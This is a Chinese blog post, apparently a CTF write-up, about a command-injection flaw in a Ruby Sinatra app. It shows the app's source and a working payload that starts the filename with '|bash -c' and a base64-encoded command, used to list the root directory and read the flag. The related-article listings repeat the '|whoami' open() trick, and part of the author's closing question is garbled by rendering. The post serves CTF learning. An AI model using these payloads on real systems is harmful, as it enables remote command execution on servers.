ruby open()函数命令执行

于 2021-09-24 10:07:39 发布
阅读量1.3k 收藏
点赞数
文章标签: ruby 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46286512/article/details/120449414
版权

本题是在2021第五空间中出现的

具体的源代码如下:

require 'sinatra'
require 'digest'
require 'base64'

get '/' do
  open("./view/index.html", 'r').read()
end

get '/upload' do
  open("./view/upload.html", 'r').read()
end

post '/upload' do
  unless params[:file] && params[:file][:tempfile] && params[:file][:filename] && params[:file][:filename].split('.')[-1] == 'png'
    return "<script>alert('error');location.href='/upload';</script>"
  end
  begin
    filename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + '.png'
    open(filename, 'wb') { |f|
      f.write open(params[:file][:tempfile],'r').read()
    }
    "Upload success, file stored at #{filename}"
  rescue
    'something wrong'
  end

end

get '/convert' do
  open("./view/convert.html", 'r').read()
end

post '/convert' do
  begin
    unless params['file']
      return "<script>alert('error');location.href='/convert';</script>"
    end

    file = params['file']
    unless file.index('..') == nil && file.index('/') == nil && file =~ /^(.+)\.png$/
      return "<script>alert('dont hack me');</script>"
    end
    res = open(file, 'r').read()
    headers 'Content-Type' => "text/html; charset=utf-8"
    "var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
  rescue
    'something wrong'
  end
end

可以看到这道题并没有什么特别复杂的点,就一个open()函数的问题,之前做题的时候查了open()函数的漏洞,没有查到,所以没有做出来,记录一下

漏洞原理

open()函数可以进行命令执行

所以exp为

file=|bash -c “$(echo ‘bHMgLw==’ | base64 -d)” #.png

file=|bash -c “$(echo ‘Y2F0IC9GTEE5X0t5d1hBdjc4TGJvcGJwQkR1V3Nt’ | base64 -d)” #.png

就get flag了

这里有一个小疑问记录一下

为什么这里的命令要用 ( ) 包 裹 , 我 查 到 的 b a s h − c " c m d S t r i n g " 不 太 理 解 这 里 为 什 么 要 加 ()包裹,我查到的bash -c "cmd String"不太理解这里为什么要加 ()bashc"cmdString"()

我尝试了一下,如果不加$(),那么ls /这条命令不会执行,而是直接会输出 ls /

所以我猜测加’ '让ls /执行,执行之后的结果再输出

有懂的大佬可以解释一些,谢谢!

qq_46286512
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
干货 | 命令执行漏洞和代码执行漏洞详解
weixin_39670937的博客
06-20 893
命令执行(RCE)漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行 一、命令执行漏洞 1、什么是命令执行 命令执行(Remote Command Execution, RCE) Web应用的脚本代码在执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令 成因 代码层过滤不严系统的漏洞造成命令注入调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP:exec、shell_exec、sy
通过发送 JSON 来执行命令?了解 Ruby 项目中不安全的反序列化漏洞如何运作
最新发布
技术超强的网络安全平台
08-24 483
这在某种程度上是可行的,但由于在这些情况下解析了 URI,因此生成的 URL 路径将无法完全选择,这使得接下来的恶作剧变得不可能。大多数情况下,不安全的反序列化漏洞都与反序列化库支持多态性的能力有关,这意味着能够实例化序列化数据中指定的任意类或类状结构。但它究竟是如何运作的呢?注意:虽然直接序​​列化单个小工具可能有意义,但序列化甚至只是调试整个小工具链通常很危险,因为它可能会在序列化过程中触发链的执行(这不会给你预期的结果,但你会“利用”你自己的系统)。因此,我们的目标 URL 将按我们想要的方式调用。
六种用ruby调用执行shell命令的方法
weixin_33738555的博客
09-23 243
碰到需要调用操作系统shell命令的时候,Ruby为我们提供了六种完成任务的方法: 1.Exec方法:     Kernel#exec方法通过调用指定的命令取代当前进程:   例子:       $ irb      &gt;&gt; exec 'echo "hello $HOSTNAME"'         hello nate.local      $值得注意的是,exec方法用ech...
RubyOpenURI模块
weixin_30417487的博客
04-18 125
Ruby中获取一个HTTP/FTP地址的内容,有一个非常方便的方法,就是使用open-uri库。 open-uri库是ruby的标准附加库中所带的,路径是:lib/oepn-uri.rb 引用了该附加库后,就可以像打开普通文件那样打开一个http/ftp的uri的资源。 有区别的地方在这里: require'open-uri' open('c:/boot.ini'){|...
『CTF Tricks』Ruby-利用File.open()执行shell命令
Ho1aAs‘s Blog
09-18 1111
# 利用 ```ruby file = '|whoami' puts open(file).read() # ubuntu puts open(file).gets # ubuntu ```
ruby 执行函数_Ruby pop()函数
cumubi7552的博客
08-02 521
ruby 执行函数 Ruby中的pop()函数 (pop() function in Ruby) If you are aware of the logic to create pop() function used in the data structure, then you are ready to understand the internal logic of pop() functio...
Ruby File.open 方法打开文件和File.new 方法打开文件的差别
lxq_9532的博客
06-21 4238
File.new 方法 您可以使用 File.new 方法创建一个 File 对象用于读取、写入或者读写,读写权限取决于 mode 参数。最后,您可以使用 File.close 方法来关闭该文件。 语法 aFile = File.new("filename", "mode") # ... 处理文件 aFile.close File.open 方法 您可以使用 File.open 方法创建一...
ruby实用函数和实例
08-21
Ruby中,有许多实用的内置函数和方法,这些工具极大地提升了开发者的效率。在这个主题下,我们将深入探讨Ruby的一些关键函数和实例,以及如何在实际编程中应用它们。 首先,我们关注的是"使用Ruby语言实现自动...
RubyIDE, the Open Source Ruby IDE-开源
05-15
同时,代码编辑器还支持代码补全,通过分析Ruby的标准库和已导入的gem,为用户提供可能的函数或方法建议,加快编写速度。 其次,RubyIDE提供了项目管理功能,允许用户组织和管理他们的代码文件。通过创建和管理项目...
深入学习Ruby中的函数与方法
### 章节一:Ruby函数与方法的基础概念 在Ruby中,函数与方法是编程中常用的概念,它们有着各自的特点和用法。本章将介绍Ruby函数与方法的基础概念,包括它们的区别、定义与调用、以及参数与返回值的使用。让...
ruby执行命令操作
guozy_u的专栏
03-17 769
exec 'echo "hello world"' =&gt; "hello world"   irb &gt;system 'echo "hello $HOSTNAME"' hell bogon =&gt;true &gt;puts $? system会将进程的退出的状态码赋值给$?,如果程序正常退出,$?的值为0,否则为非0。通过检测退出的状态码我们可以在ruby脚本中抛出...
Ruby元编程》之Open Class
Java的专栏
11-22 1506
例如,在下面代码中: def to_alphanumeric(s) s.gsub /[^\w\s], '' end 很显然,在上面代码中,to_alphanumberic这个方法不符合面向对象的思想,也不符合ruby的一切皆对象的思想。 更好的方法是这个方法应该在字符串本身来提高,而不是Helper和Utils类。 然后在String类添加这个方法,很简单:
linux ruby更新命令行,Ruby执行Linux shell命令的六种方法详解
weixin_34820916的博客
04-29 141
Ruby中,执行shell命令是一件不奇怪的事情,Ruby提供了大概6种方法供开发者进行实现。这些方法都很简单,本文将具体介绍一下如何在Ruby脚本中进行调用终端命令。execexec会将指定的命令替换掉当前进程中的操作,指定命令结束后,进程结束。exec 'echo "hello world"'print 'abc'执行上述的命令,结果如下,我们可以看到没有abc的输出,可以看出来,在执行ec...
ruby打开共享文件夹里面的类容
xzyxuanyuan的专栏
04-27 1192
p File.open("\\192.168.100.111\share\test.txt").read
Ruby 执行shell命令方法
chenbinGood的专栏
09-21 444
有时需要在程序中执行命令来完成操作,执行命令的方法如下: Exec      $ irb &gt;&gt; exec 'echo "hello $HOSTNAME"' hello nate.local $        exec方法用echo命令来取代了irb进程从而退出了irb。主要的缺点是,你无法从你的ruby脚本里知道这个命令...
ruby-从入门到放弃-调用外部命令的实现方式-Open3
constant_rain的博客
08-22 660
open3的使用说明 我在这里就不重复造轮子了,直接使用腾讯云的open3的文档来讲解open3里面的方法以及使用说明:文档地址 着重讲解一下open3.popen3的使用 popen3(*cmd, **opts, &block) Show source 打开stdin,stdout和stderr流并启动外部可执行文件。另外,创建一个等待启动的进程的线程。线程有一个pid方法和一个线程变量:pid,它是启动进程的pid。 块形式: Open3.popen3([env,] cmd... [, op
ruby OpenURI模块使用
weixin_34269583的博客
05-07 336
OpenURI is an easy-to-use wrapper for Net::HTTP, Net::HTTPS and Net::FTP(OpenURI支持重定向) 像打开普通文件那样打开http/ftp的URL open("http://www.ruby-lang.org/") {|f| f.each_line {|line| p line} } 打开...
在Sinatra程序里实现HTTP Digest Authorization
iteye_2249的博客
09-19 146
网上没找到相关的文章,在这里发一下。 密码在数据库里明文储存的情况。 [code="ruby"]require 'rubygems' require 'sinatra' class MyAuth < Rack::Auth::Digest::MD5 def initialize(*args) super self.opaque = 'this-shoul...
[Ruby笔记]4. ruby 读写文件 File open read write new
需要加盐吗?
05-16 1832
Run新建了一个文件temp.dat 存了一个数据,整数 100PS C:\Users\Administrator\RubyCode> more temp.dat 100PS C:\Users\Administrator\RubyCode> ruby c2fin2out.rbReading Celsius temperature value from data file... The Celsius
从新手到专业:Ruby编程指南
封面的"The Expert's Voice® in Open Source"强调了这本书对于理解和应用Ruby技术的专业性和实践价值。书中内容覆盖了Ruby的基础知识,如语法、数据类型、控制结构、函数、模块、类和对象等核心概念,以及面向对象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值